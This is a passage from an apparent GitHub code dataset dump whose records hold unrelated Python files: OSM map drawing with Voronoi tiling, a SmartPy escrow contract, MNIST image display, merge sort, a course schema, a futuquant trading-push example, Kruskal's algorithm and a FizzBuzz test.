\"NJ\",\n \"New Mexico\": \"NM\",\n \"New York\": \"NY\",\n \"North Carolina\": \"NC\",\n \"North Dakota\": \"ND\",\n \"Ohio\": \"OH\",\n \"Oklahoma\": \"OK\",\n \"Oregon\": \"OR\",\n \"Pennsylvania\": \"PA\",\n \"Rhode Island\": \"RI\",\n \"South Carolina\": \"SC\",\n \"South Dakota\": \"SD\",\n \"Tennessee\": \"TN\",\n \"Texas\": \"TX\",\n \"Utah\": \"UT\",\n \"Vermont\": \"VT\",\n \"Virginia\": \"VA\",\n \"Washington\": \"WA\",\n \"West Virginia\": \"WV\",\n \"Wisconsin\": \"WI\",\n \"Wyoming\": \"WY\",\n}\n\n\nclass State:\n def __init__(self, name, osm_filename=None):\n self.name = name.title().replace(\"-\", \" \")\n self.abbrev = stateToAbbrevDict[self.name]\n self.osm_filename = osm_filename\n if osm_filename is None:\n self.osm_filename = self.name.lower().replace(\" \", \"-\")\n\n def __lt__(self, o):\n return self.name < o.name\n\n\ndef make_rainbow():\n states = [\"rainbow.pbf\"]\n return states\n\n\ndef make_sea_to_bos():\n # sea->bos states\n\n states = [\n \"washington\",\n \"idaho\",\n # \"montana\",\n # \"north-dakota\",\n # \"minnesota\",\n # \"wisconsin\",\n # \"illinois\",\n # \"indiana\",\n # \"ohio\",\n # \"pennsylvania\",\n # \"new-york\",\n # \"massachusetts\"\n ]\n\n return [State(s) for s in states]\n\n\ndef make_continental_us():\n # all continental US states\n\n states = [\n \"Alabama\",\n # \"Alaska\",\n \"Arizona\",\n \"Arkansas\",\n # \"California\",\n \"Colorado\",\n \"Connecticut\",\n \"Delaware\",\n \"Florida\",\n \"Georgia\",\n # \"Hawaii\",\n \"Idaho\",\n \"Illinois\",\n \"Indiana\",\n \"Iowa\",\n \"Kansas\",\n \"Kentucky\",\n \"Louisiana\",\n \"Maine\",\n \"Maryland\",\n \"Massachusetts\",\n \"Michigan\",\n \"Minnesota\",\n \"Mississippi\",\n \"Missouri\",\n \"Montana\",\n \"Nebraska\",\n \"Nevada\",\n \"New Hampshire\",\n \"New Jersey\",\n \"New Mexico\",\n \"New York\",\n \"North Carolina\",\n \"North Dakota\",\n \"Ohio\",\n \"Oklahoma\",\n \"Oregon\",\n \"Pennsylvania\",\n \"Rhode Island\",\n \"South Carolina\",\n \"South Dakota\",\n \"Tennessee\",\n \"Texas\",\n \"Utah\",\n \"Vermont\",\n \"Virginia\",\n \"Washington\",\n \"West Virginia\",\n \"Wisconsin\",\n \"Wyoming\",\n ]\n\n states = [State(s) for s in states] + [\n State(\"California\", \"norcal\"),\n State(\"California\", \"socal\"),\n ]\n\n states.sort()\n\n return states\n\n\nif True:\n states = make_continental_us()\nelse:\n states = make_sea_to_bos()\n\nrel_path = \"OSM\"\nsuffix = \"-latest.osm.pbf\"\n# suffix = \"\"\n\nIM_WIDTH = 6000\nIM_HEIGHT = 3500\n\n\ndef bdg_map(v, in_min, in_max, out_min, out_max):\n f = (v - in_min) / (in_max - in_min)\n return out_min + f * (out_max - out_min)\n\n\nim = Image.new(\"RGB\", (IM_WIDTH, IM_HEIGHT), (128, 200, 128))\ndraw = ImageDraw.Draw(im)\n\n\nclass City:\n def __init__(self, name, state_name, lat, lon, pop):\n self.name = name\n self.state_name = state_name\n self.lat = lat\n self.lon = lon\n self.pop = pop\n\n def __lt__(self, o):\n return self.pop < o.pop\n\n def __str__(self):\n return \"%s, %s (%f, %f) p: %d\" % (\n self.name,\n self.state_name,\n self.lat,\n self.lon,\n self.pop,\n )\n\n def __repr__(self):\n return str(self)\n\n def dist(self, other):\n return bdgmath.haversine_distance_deg(self.lat, self.lon, other.lat, other.lon)\n\n\ncities = []\n\nfor s in states:\n im.save(\"map.png\")\n\n print(\"state: %s (%s)\" % (s.name, s.abbrev))\n\n # fp = get_data(s, directory=rel_path)\n\n p = os.path.join(rel_path, s.osm_filename + suffix)\n\n print(p)\n\n cmd = \"./DrawMap/drawmap/target/release/drawmap \" + p\n print(cmd)\n\n proc = subprocess.run(cmd.split(), capture_output=True)\n\n print(\"returncode:\", proc.returncode)\n\n out_lines = str(proc.stdout, \"UTF-8\").split(\"\\n\")\n # for o in out_lines:\n # print(o)\n\n color = (255, 0, 0)\n\n if proc.returncode == 0:\n state_cities = []\n\n for line in out_lines:\n # print(line)\n if line.startswith(\"Found a city:\"):\n # print(line)\n m = re.search(\n 'name=\"([A-Za-z ]+)\" lat=([0-9\\.-]*), lon=([0-9\\.-]*), population=([0-9]+)',\n line,\n )\n # print (\"city match?\", m)\n if m:\n # print(m[1])\n # print(m[2])\n # print(m[3])\n # print(m[4])\n\n name = m[1]\n lat = float(m[2])\n lon = float(m[3])\n pop = int(m[4])\n\n city = City(name, s.name, lat, lon, pop)\n state_cities.append(city)\n print(\"city:\", city)\n\n if line == \"highway\":\n color = (64, 64, 64)\n # print(\"got hwy\")\n if line == \"Found a boundary\":\n color = (0, 0, 128)\n # print(\"got boundary\")\n if line.startswith(\"pl:\"):\n coords = []\n\n if color == (0, 0, 128):\n continue\n\n if \"[\" in line and \"]\" in line:\n left = line.index(\"[\")\n right = line.index(\"]\")\n line = line[left + 1 : right]\n # print (\"stripped line:\", line)\n\n while line:\n if \"(\" in line and \")\" in line:\n left = line.index(\"(\")\n right = line.index(\")\")\n coord_str = line[left + 1 : right]\n # print (\"found coord\", coord_str)\n line = line[right + 1 :]\n\n terms = coord_str.split(\",\")\n coords.append((float(terms[0]), float(terms[1])))\n else:\n break\n\n # print(\"parsed coords:\", coords)\n\n im_coords = []\n for c in coords:\n c_lat, c_lon = c\n ix = bdg_map(c_lon, west_limit, east_limit, 0, IM_WIDTH)\n iy = bdg_map(c_lat, north_limit, south_limit, 0, IM_HEIGHT)\n im_coords.append((ix, iy))\n\n # print(\"drawing\", im_coords)\n\n draw.line(im_coords, fill=color, width=2)\n # exit(-1)\n\n for sc in state_cities:\n ix = bdg_map(sc.lon, west_limit, east_limit, 0, IM_WIDTH)\n iy = bdg_map(sc.lat, north_limit, south_limit, 0, IM_HEIGHT)\n\n radius = 3.5\n\n draw.ellipse(\n (ix - radius, iy - radius, ix + radius, iy + radius),\n fill=(255, 192, 0),\n )\n cities.append(sc)\n\n else:\n print(\"error\")\n err_lines = str(proc.stderr, \"UTF-8\").split(\"\\n\")\n for e in err_lines:\n print(\"ERR: \", e)\n\ncities.sort()\ncities = cities[::-1]\n\nprint()\nprint()\n\nfor ci, c in enumerate(cities):\n print(ci, c)\n\nim.save(\"map.png\")\n\n\n# ----------------------------------------\n# Bridsonize\n# ----------------------------------------\n\ngrid = {}\n\npoint_spacing = 1.0\n\ncell_size = point_spacing / math.sqrt(2.0)\n\n\ndef lat_lon_to_index(lat, lon):\n ix = math.floor((lon - west_limit) / cell_size)\n iy = math.floor((lat - south_limit) / cell_size)\n\n return (ix, iy)\n\n\ndef can_insert(lat, lon):\n if (\n (lon < west_limit)\n or (lon > east_limit)\n or (lat < south_limit)\n or (lat > north_limit)\n ):\n return False\n\n ix, iy = lat_lon_to_index(lat, lon)\n\n for dx in range(-2, 3):\n px = ix + dx\n for dy in range(-2, 3):\n py = iy + dy\n\n probe_key = (px, py)\n if probe_key in grid:\n g_lat, g_lon = grid[probe_key]\n\n d_lat = lat - g_lat\n d_lon = lon - g_lon\n\n # dist = math.sqrt(d_lat * d_lat + d_lon * d_lon)\n dist = bdgmath.haversine_distance_deg(lat, lon, g_lat, g_lon)\n\n if dist <= point_spacing:\n return False\n return True\n\n\nopen_points = []\nadded_points = []\n\nfor c in cities:\n if can_insert(c.lat, c.lon):\n ci = lat_lon_to_index(c.lat, c.lon)\n grid[ci] = (c.lat, c.lon)\n print(\"inserted\", c)\n open_points.append((c.lat, c.lon))\n added_points.append((c.lat, c.lon))\n\nk = 30\n\nwhile open_points:\n p_lat, p_lon = open_points[0]\n open_points = open_points[1:]\n\n p = (p_lat, p_lon)\n\n # print(\"examining\", p)\n\n seed = random.random()\n epsilon = 0.000001\n\n inserted = False\n\n for j in range(k):\n # theta = 2 * math.pi * (seed + float(j) / k)\n heading = 360.0 * (seed + float(j) / k)\n\n r = point_spacing + epsilon\n # new_lat = p_lat + r * math.sin(theta)\n # new_lon = p_lon + r * math.cos(theta)\n new_lat, new_lon = bdgmath.haversine_offset_deg(p_lat, p_lon, heading, r)\n\n if can_insert(new_lat, new_lon):\n ni = lat_lon_to_index(new_lat, new_lon)\n grid[ni] = (new_lat, new_lon)\n open_points.append((new_lat, new_lon))\n inserted = True\n # print(\"inserted new point\", new_lat, new_lon)\n added_points.append((new_lat, new_lon))\n\n # --- draw ---\n\n ix = bdg_map(new_lon, west_limit, east_limit, 0, IM_WIDTH)\n iy = bdg_map(new_lat, north_limit, south_limit, 0, IM_HEIGHT)\n\n radius = 3.5\n\n draw.ellipse(\n (ix - radius, iy - radius, ix + radius, iy + radius),\n fill=(0, 0, 64),\n )\n\n\nim.save(\"map.png\")\n\n# ----------------------------------------\n# voronoi\n# ----------------------------------------\n# see https://docs.scipy.org/doc/scipy/reference/generated/scipy.spatial.Voronoi.html\n\nimport numpy as np\nfrom scipy.spatial import Voronoi, voronoi_plot_2d\n\nxys = [(p[1], p[0]) for p in added_points]\n# make up data points\npoint_array = np.array(xys)\n\n# compute Voronoi tesselation\nvor = Voronoi(point_array)\n\nprint(\"points:\", vor.points)\nprint(\"vertices:\", vor.vertices)\n\n# write json\nimport json\nimport glob\nimport os\n\nfor fn in glob.glob(\"Tiles/*.json\"):\n os.unlink(fn)\n\nwith open(\"Tiles/voronoi.json\", \"wt\") as vf:\n data = {}\n\n point_list = []\n for pi, p in enumerate(vor.points):\n point_list.append({\"lat\": p[1], \"lon\": p[0], \"point_index\": pi})\n data[\"points\"] = point_list\n\n vert_list = []\n for pi, p in enumerate(vor.vertices):\n vert_list.append({\"lat\": p[1], \"lon\": p[0], \"vert_index\": pi})\n data[\"vertices\"] = vert_list\n\n region_list = []\n for ri, r in enumerate(vor.regions):\n if -1 in r:\n continue\n\n if len(r) == 0:\n continue\n\n r_data = {\"vert_indices\": r, \"region_index\": ri}\n region_list.append(r_data)\n data[\"regions\"] = region_list\n\n vf.write(json.dumps(data, indent=2))\n\n# make tile objects\nimport tile\nimport point\n\nprint(\"going to try to save %d regions\" % len(vor.regions))\nprint(\"I have %d points\" % len(vor.points))\n\nregion_to_point_map = {}\nfor pi in range(len(vor.points)):\n ri = vor.point_region[pi]\n region_to_point_map[ri] = pi\n\n\ntiles = []\n\nfor ri, r in enumerate(vor.regions):\n if -1 in r:\n continue\n if len(r) == 0:\n continue\n\n if ri not in region_to_point_map:\n print(\"error, running off end of points\")\n break\n\n t = tile.Tile()\n pi = region_to_point_map[ri]\n p = vor.points[pi]\n tile_centroid = point.Point(p[1], p[0], None, None)\n t.centroid_lat_lon = tile_centroid\n t.tile_id = pi\n\n verts = []\n for vi in r:\n p = vor.vertices[vi]\n pt = point.Point(p[1], p[0], None, None)\n verts.append(pt)\n t.verts_lat_lon = verts\n t.make_bbox_lat_lon()\n\n # todo more population\n\n tiles.append(t)\n\nfor c in cities:\n for t in tiles:\n if t.point_in_tile_lat_lon(c.lat, c.lon):\n t.city_list.append(c.name)\n if c.state_name not in t.state_list:\n t.state_list.append(c.state_name)\n t.state_list.sort()\n\nfor t in tiles:\n fn = \"Tiles/tile_%04d.json\" % (t.tile_id)\n t.to_json(fn)\n\nfor region in vor.regions:\n if -1 in region:\n continue\n\n polygon = [vor.vertices[i] for i in region]\n\n for i in range(len(polygon)):\n j = i - 1\n\n x1, y1 = polygon[i]\n x2, y2 = polygon[j]\n\n i_x1 = bdg_map(x1, west_limit, east_limit, 0, IM_WIDTH)\n i_y1 = bdg_map(y1, north_limit, south_limit, 0, IM_HEIGHT)\n i_x2 = bdg_map(x2, west_limit, east_limit, 0, IM_WIDTH)\n i_y2 = bdg_map(y2, north_limit, south_limit, 0, IM_HEIGHT)\n\n try:\n draw.line((i_x1, i_y1, i_x2, i_y2), fill=(255, 20, 20), width=3)\n except ValueError as ve:\n print(\"value error drawing line\", i_x1, i_y1, i_x2, i_y2)\n\n\nim.save(\"map.png\")\n","repo_name":"tsmaster/BigMesh","sub_path":"makevoronoitiles.py","file_name":"makevoronoitiles.py","file_ext":"py","file_size_in_byte":14649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9435547825","text":"# Escrow - Example for illustrative purposes only.\r\n\r\nimport smartpy as sp\r\n\r\nclass Escrow(sp.Contract):\r\n #Modified\r\n def __init__(self, owner, fromOwner, counterparty, fromCounterparty, epoch, hashedSecret, admin):\r\n self.init(fromOwner = fromOwner,\r\n fromCounterparty = fromCounterparty,\r\n balanceOwner = sp.tez(0),\r\n balanceCounterparty = sp.tez(0),\r\n hashedSecret = hashedSecret,\r\n epoch = epoch,\r\n owner = owner,\r\n counterparty = counterparty,\r\n admin = admin,\r\n withdrawalAuthorized = sp.bool(False),\r\n withdrawOwner = sp.bool(False),\r\n withdrawCounterparty = sp.bool(False))\r\n\r\n #Modified\r\n @sp.entry_point\r\n def addBalanceOwner(self):\r\n sp.verify(sp.sender == self.data.owner, \"NOT AUTHORIZED: ESCROW OWNER ONLY\")\r\n sp.verify(self.data.balanceOwner == sp.tez(0), \"OWNER HAS ALREADY ADDED BALANCE\")\r\n sp.verify(sp.amount == self.data.fromOwner)\r\n self.data.balanceOwner = self.data.fromOwner\r\n\r\n #Modified\r\n @sp.entry_point\r\n def addBalanceCounterparty(self):\r\n sp.verify(sp.sender == self.data.counterparty, \"NOT AUTHORIZED: ESCROW COUNTERPARTY ONLY\")\r\n sp.verify(self.data.balanceCounterparty == sp.tez(0), \"COUNTERPARTY HAS ALREADY ADDED BALANCE\")\r\n sp.verify(sp.amount == self.data.fromCounterparty)\r\n self.data.balanceCounterparty = self.data.fromCounterparty\r\n\r\n def claim(self, identity):\r\n sp.verify(sp.sender == identity)\r\n sp.send(identity, self.data.balanceOwner + self.data.balanceCounterparty)\r\n self.data.balanceOwner = sp.tez(0)\r\n self.data.balanceCounterparty = sp.tez(0)\r\n\r\n #Modified\r\n @sp.entry_point\r\n def claimCounterparty(self, params):\r\n sp.verify(sp.sender == self.data.counterparty, \"NOT AUTHORIZED: ESCROW COUNTERPARTY ONLY\")\r\n sp.verify(sp.now < self.data.epoch)\r\n sp.verify(self.data.hashedSecret == sp.blake2b(params.secret))\r\n self.claim(self.data.counterparty)\r\n\r\n #Modified\r\n @sp.entry_point\r\n def claimOwner(self):\r\n sp.verify(sp.sender == self.data.owner, \"NOT AUTHORIZED: ESCROW OWNER ONLY\")\r\n sp.verify(self.data.epoch < sp.now)\r\n self.claim(self.data.owner)\r\n\r\n #Added\r\n @sp.entry_point\r\n def revertOwner(self):\r\n sp.verify(sp.sender == self.data.owner, \"NOT AUTHORIZED: ESCROW OWNER ONLY\")\r\n self.data.withdrawOwner = sp.bool(True)\r\n\r\n #Added\r\n @sp.entry_point\r\n def revertCounterparty(self):\r\n sp.verify(sp.sender == self.data.counterparty, \"NOT AUTHORIZED: ESCROW COUNTERPARTY ONLY\")\r\n self.data.withdrawCounterparty = sp.bool(True)\r\n \r\n #Added\r\n @sp.entry_point\r\n def revertFunds(self):\r\n sp.verify(sp.sender == self.data.admin, \"NOT AUTHORIZED: ESCROW ADMIN ONLY\")\r\n sp.verify(self.data.withdrawOwner, \"OWNER MUST AGREE TO WITHDRAW FROM CONTRACT\")\r\n sp.verify(self.data.withdrawCounterparty, \"COUNTERPARTY MUST AGREE TO WITHDRAW FROM CONTRACT\")\r\n \r\n self.data.withdrawalAuthorized = sp.bool(True)\r\n sp.send(self.data.owner, self.data.balanceOwner)\r\n sp.send(self.data.counterparty, self.data.balanceCounterparty)\r\n self.data.balanceOwner = sp.tez(0)\r\n self.data.balanceCounterparty = sp.tez(0)\r\n \r\n\r\n@sp.add_test(name = \"Escrow\")\r\ndef test():\r\n scenario = sp.test_scenario()\r\n scenario.h1(\"Escrow\")\r\n hashSecret = sp.blake2b(sp.bytes(\"0x01223344\"))\r\n alice = sp.test_account(\"Alice\")\r\n bob = sp.test_account(\"Bob\")\r\n admin = sp.test_account(\"Admin\")\r\n c1 = Escrow(alice.address, sp.tez(50), bob.address, sp.tez(4), sp.timestamp(123), hashSecret, admin.address)\r\n scenario += c1\r\n c1.addBalanceOwner().run(sender = alice, amount = sp.tez(50))\r\n c1.addBalanceCounterparty().run(sender = bob, amount = sp.tez(4))\r\n scenario.h3(\"Erronous secret\")\r\n c1.claimCounterparty(secret = sp.bytes(\"0x01223343\")) .run(sender = bob, valid = False)\r\n scenario.h3(\"Correct secret\")\r\n c1.claimCounterparty(secret = sp.bytes(\"0x01223344\")).run(sender = bob)\r\n\r\nsp.add_compilation_target(\"escrow\", Escrow(sp.address(\"tz1cqPT2LkjD8LhXMiW8fKzFTkqTUrcgznNN\"), sp.tez(50),\r\n sp.address(\"tz1UbYuXW4sAczjvMzrgTM96vp2NHhsxqu77\"), sp.tez(4),\r\n sp.timestamp(1712479881), sp.bytes(\"0xc2e588e23a6c8b8192da64af45b7b603ac420aefd57cc1570682350154e9c04e\"),\r\n sp.address(\"tz1cftYcJt2rQydsbCDCP19zTpqeztLauFBM\")))\r\n","repo_name":"KristineNunez/Mini-Project-2","sub_path":"contract/Revised_Escrow.py","file_name":"Revised_Escrow.py","file_ext":"py","file_size_in_byte":4791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70866245970","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\n# TensorFlow and tf.keras\nimport tensorflow as tf\nfrom tensorflow import keras\n\n# Helper libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport scipy.misc\n\nprint(tf.__version__)\n\n\n\nmnist = keras.datasets.mnist\n\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\nimg = x_train[1]\nprint(img.shape)\nprint(type(img))#图片类型\nprint(img.dtype)#数据类型\nprint(img.shape)#图片大小\nscipy.misc.imsave('im.jpg', img)#保存图片\n\nplt.figure()\nplt.imshow(x_train[1])\nplt.colorbar()\nplt.grid(False)\nplt.show()\n\n\nimg = scipy.misc.imread('test.jpeg',mode='RGB')\n \nprint(img.shape)\nprint(type(img))#图片类型\nprint(img.dtype)#数据类型\nprint(img.shape)#图片大小\n \nplt.figure(1)\nplt.imshow(img)\nplt.colorbar()\nplt.grid(False)\nplt.show()\n\n#img_tensor = tf.image.decode_image(img)\n#img_tensor = tf.image.decode_jpeg(img_tensor, channels=3)\n#img_tensor = tf.image.resize(img_tensor, [28, 28])\n#img_tensor /= 255.0 # normalize to [0,1] range\n#\n#\n#scipy.misc.imsave('process.jpg', img_tensor)#保存图片","repo_name":"asysbang/tensorflow","sub_path":"handwriting/myhand.py","file_name":"myhand.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15396719709","text":"\n\ndef insertionSort2(arr):\n n = len(arr) # Get the length of the array\n \n if n <= 1:\n return # If the array has 0 or 1 element, it is already sorted, so return\n \n for i in range(1, n): # Iterate over the array starting from the second element\n key = arr[i] # Store the current element as the key to be inserted in the right position\n j = i-1\n while j >= 0 and key < arr[j]: # Move elements greater than key one position ahead\n arr[j+1] = arr[j] # Shift elements to the right\n j -= 1\n arr[j+1] = key # Insert the key in the correct position\n\ndef merge_sort(list):\n\n k = 9\n\n if len(list) <= k:\n print(\"whoop\")\n print (len(list))\n insertionSort2(list)\n return list\n\n mid = len(list) // 2\n\n left_values = merge_sort(list[:mid])\n\n right_values = merge_sort(list[mid:])\n\n l = []\n\n i = 0\n\n j = 0\n\n while i < len(left_values) and j < len(right_values):\n\n if left_values[i] < right_values[j]:\n l.append(left_values[i])\n i += 1\n\n else:\n l.append(right_values[j])\n j += 1\n\n l += left_values[i:]\n l += right_values[j:]\n\n return l\n\n\nnewList = [5,3,1,2,6,4,9,7,8,10,61,55,33,45,86,32,14,57,87,99,55,30,22,66,88]\n\nprint(newList)\n\nprint(merge_sort(newList))","repo_name":"add33m/d0012e","sub_path":"lab1/mergeSort.py","file_name":"mergeSort.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15659817922","text":"from schema import Schema, And, Or, Regex\n\nfrom validations.schemas.base_schema import BaseSchema\n\n\nclass CoursesSchema(BaseSchema):\n SCHEMA = Schema([{\n 'id': str,\n 'code': Or(And(str, BaseSchema.COURSE_CODE_LAMBDA), None), # course code should be a string and of length 8\n 'name': str,\n 'description': Or(str, None),\n 'division': str,\n 'department': str,\n 'prerequisites': Or(str, None),\n 'corequisites': Or(str, None),\n 'exclusions': Or(str, None),\n 'recommended_preparation': Or(str, None),\n 'level': Regex(r'^\\d00(/(A|B|C|D))?$'),\n 'campus': Or(*BaseSchema.VALID_CAMPUSES),\n 'term': str,\n 'arts_and_science_breadth': Or(str, None),\n 'arts_and_science_distribution': Or(str, None),\n 'utm_distribution': Or(str, None),\n 'utsc_breadth': Or(str, None),\n 'apsc_electives': Or(str, None),\n 'meeting_sections': [{\n 'code': str,\n 'instructors': Schema([str]),\n 'times': [{\n 'day': str,\n 'start': int,\n 'end': int,\n 'duration': int,\n 'location': Or(str, None)\n }],\n 'size': int,\n 'enrollment': Or(int, None),\n 'waitlist_option': bool,\n 'delivery': str\n }],\n 'last_updated': str\n }])\n","repo_name":"nikel-api/nikel-parser","sub_path":"validations/schemas/courses_schema.py","file_name":"courses_schema.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"22949760966","text":"# -*- coding: utf-8 -*-\n\"\"\"\nExamples for use the python functions: get push data\n\"\"\"\nfrom futuquant.open_context import *\n\nclass USOrderPushHandler(USTradeOrderHandlerBase):\n \"\"\"\n 美股定单\n \"\"\"\n def on_recv_rsp(self, rsp_str):\n \"\"\"数据响应回调函数\"\"\"\n ret_code, content = super(USOrderPushHandler, self).on_recv_rsp(rsp_str)\n if ret_code != RET_OK:\n print(\"USOrderPushHandler: error, msg: %s \" % content)\n return RET_ERROR, content\n print(\"USOrderPushHandler\\n\", content)\n return RET_OK, content\n\n\nclass USDealPushHandler(USTradeDealHandlerBase):\n \"\"\"\n 美股成交推送\n \"\"\"\n def on_recv_rsp(self, rsp_str):\n \"\"\"数据响应回调函数\"\"\"\n ret_code, content = super(USDealPushHandler, self).on_recv_rsp(rsp_str)\n if ret_code != RET_OK:\n print(\"USDealPushHandler: error, msg: %s \" % content)\n return RET_ERROR, content\n print(\"USDealPushHandler\\n\", content)\n return RET_OK, content\n\n\nclass HKOrderPushHandler(HKTradeOrderHandlerBase):\n \"\"\"\n 港股定单状态推送\n \"\"\"\n def on_recv_rsp(self, rsp_str):\n \"\"\"数据响应回调函数\"\"\"\n ret_code, content = super(HKOrderPushHandler, self).on_recv_rsp(rsp_str)\n if ret_code != RET_OK:\n print(\"HKOrderPushHandler: error, msg: %s \" % content)\n return RET_ERROR, content\n print(\"HKOrderPushHandler\\n\", content)\n return RET_OK, content\n\n\nclass HKDealPushHandler(HKTradeDealHandlerBase):\n \"\"\"\n 港股成交推送\n \"\"\"\n def on_recv_rsp(self, rsp_str):\n \"\"\"数据响应回调函数\"\"\"\n ret_code, content = super(HKDealPushHandler, self).on_recv_rsp(rsp_str)\n if ret_code != RET_OK:\n print(\"HKDealPushHandler: error, msg: %s \" % content)\n return RET_ERROR, content\n print(\"HKDealPushHandler\\n\", content)\n return RET_OK, content\n\nif __name__ == \"__main__\":\n api_ip = '127.0.0.1' # ''119.29.141.202'\n api_port = 11111\n unlock_pwd = '979899'\n\n '''\n # 港股模拟环境下单及推送\n trade_context = OpenHKTradeContext(host=api_ip, port=api_port)\n trade_context.unlock_trade(unlock_pwd)\n trade_context.set_handler(HKOrderPushHandler())\n trade_context.set_handler(HKDealPushHandler())\n trade_context.start()\n\n # print('\\nHK position_list_query:\\n')\n # print(trade_context.position_list_query(strcode='', stocktype='',\n # pl_ratio_min='', pl_ratio_max='', envtype=1))\n\n # print(trade_context.position_list_query(strcode='', stocktype='',\n # pl_ratio_min='', pl_ratio_max='', envtype=1))\n\n # print('\\nHK history_order_list_query:\\n')\n # print(trade_context.history_order_list_query(statusfilter='2,3', strcode='',\n # start='2017-10-01', end='2017-11-31', envtype=1))\n\n # print('\\nHK order_list_query:\\n')\n # print(trade_context.order_list_query(orderid='', statusfilter='', strcode='',\n # start='09:30:00', end='24:00:00', envtype=1))\n\n # print('\\nHK history_deal_list_query:\\n')\n # print(trade_context.history_deal_list_query(strcode='', start='2017-10-01', end='2017-11-31', envtype=1))\n\n # print('\\nHK deal_list_query:\\n')\n # print(trade_context.deal_list_query(envtype=1))\n\n print('\\nHK place_order:')\n orderid_list = [] # ['836204', '836195'] # 传空表示定阅全部订单\n trade_context.subscribe_order_deal_push(orderid_list, True, envtype=1)\n # print(trade_context.place_order(price=4.50, qty=1000, strcode='HK.03883', orderside=0, ordertype=0, envtype=1,\n # order_deal_push=False))\n print(trade_context.place_order(price=11.31, qty=1000, strcode='HK.01357', orderside=0, ordertype=0, envtype=1,\n order_deal_push=True, price_mode=PriceRegularMode.UPPER))\n '''\n\n #'''\n #美股正式环境下单及推送\n trade_context = OpenUSTradeContext(host=api_ip, port=api_port)\n print(trade_context.unlock_trade(unlock_pwd))\n trade_context.set_handler(USOrderPushHandler())\n trade_context.set_handler(USDealPushHandler())\n trade_context.start()\n\n # print('\\nUS position_list_query:\\n')\n # print(trade_context.position_list_query(strcode='', stocktype='STOCK',\n # pl_ratio_min='-20.5', pl_ratio_max='0', envtype=0))\n\n # print('\\nUS. history_order_list_query:\\n')\n # print(trade_context.history_order_list_query(statusfilter='', strcode='', start='2017-10-01', end='2017-11-31', envtype=0))\n\n # print('\\nUS. order_list_query:\\n')\n # print(trade_context.order_list_query(statusfilter='', strcode='US.MIN', start='', end='', envtype=0))\n\n # print('\\nUS. history_deal_list_query:\\n')\n # print(trade_context.history_deal_list_query(strcode='', start='2017-10-01', end='2017-11-31', envtype=0))\n # print('\\nUS. deal_list_query:\\n')\n # print(trade_context.deal_list_query(envtype=0))\n\n # trade_context.subscribe_order_deal_push('', True, 0)\n # print('\\nUS place_order:')\n print(trade_context.place_order(price=\"3.55\", qty=1, strcode='US.MIN', orderside=0, ordertype=2, envtype=0, order_deal_push=True, price_mode=PriceRegularMode.LOWER))\n # '''\n","repo_name":"dongxiao999999/futuquant","sub_path":"futuquant/examples/trade_order_push.py","file_name":"trade_order_push.py","file_ext":"py","file_size_in_byte":5378,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"66"} +{"seq_id":"72693915730","text":"import sys, heapq\n\ndef find_set(x):\n if p[x] == x:\n return x\n else:\n return find_set(p[x])\n\ndef union(a, b):\n p_a = find_set(a)\n p_b = find_set(b)\n p[p_b] = p_a\n\nN = int(sys.stdin.readline())\narr = [list(map(float, sys.stdin.readline().split())) for _ in range(N)]\np = [_ for _ in range(N)]\ndata = []\nfor i in range(N):\n for j in range(N):\n if i != j:\n a = arr[i]\n b = arr[j]\n dist = round(((a[0]-b[0])**2+(a[1]-b[1])**2)**0.5, 2)\n heapq.heappush(data, (dist, i, j))\n\ndef kruskal(data):\n ans = 0\n while data:\n w, s, e = heapq.heappop(data)\n if find_set(s) == find_set(e):\n continue\n ans += w\n union(s, e)\n return ans\n\nprint(kruskal(data))","repo_name":"Im-sy/Algorithm","sub_path":"BOJ/bj_4386.py","file_name":"bj_4386.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4416801452","text":"# coding: utf-8\nimport unittest\n\nfrom problems.fizz_buzz import Solution\n\n\nclass TestCase(unittest.TestCase):\n def setUp(self):\n self.solution = Solution()\n\n def test(self):\n test_data = [\n {'n': 1, 'expected': ['1', ]},\n {'n': 15, 'expected': ['1', '2', 'Fizz', '4', 'Buzz', 'Fizz', '7', '8', 'Fizz', 'Buzz', '11', 'Fizz', '13', '14', 'FizzBuzz']},\n {'n': 31, 'expected': ['1', '2', 'Fizz', '4', 'Buzz', 'Fizz', '7', '8', 'Fizz', 'Buzz', '11', 'Fizz', '13', '14', 'FizzBuzz', '16', '17', 'Fizz', '19', 'Buzz', 'Fizz', '22', '23', 'Fizz', 'Buzz', '26', 'Fizz', '28', '29', 'FizzBuzz', '31']},\n {'n': 0, 'expected': []},\n {'n': -15, 'expected': []},\n ]\n for data in test_data:\n n = data['n']\n expected = data['expected']\n with self.subTest(n=n):\n self.assertEqual(list(self.solution.fizzBuzz(n)), expected)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"vinta/fuck-coding-interviews","sub_path":"problems/tests/test_fizz_buzz.py","file_name":"test_fizz_buzz.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":652,"dataset":"github-code","pt":"66"} +{"seq_id":"26590428485","text":"#!/usr/bin/env python\n# 2016 (C) Valentin Lukyanets, SCSm-16-1\n\n\nfrom __future__ import print_function\nimport argparse\nimport re\nimport modeling\n\n\ndef read_input_data(filename):\n scheme_re = re.compile(r'^Scheme: (\\d+) lines; input (\\S+); output (\\S+); assert (\\S+)', re.IGNORECASE)\n truthtable_header_re = re.compile(r'^Truthtable \"(.+)\": (\\d+) inputs, (\\d+) outputs, (\\d+) lines', re.IGNORECASE)\n truthtable_line_re = re.compile(r'^(\\S+) (\\S+)')\n element_re = re.compile(r'^Element \"(.+)\": \"(.+)\"; in (\\S+); out (\\S+)', re.IGNORECASE)\n 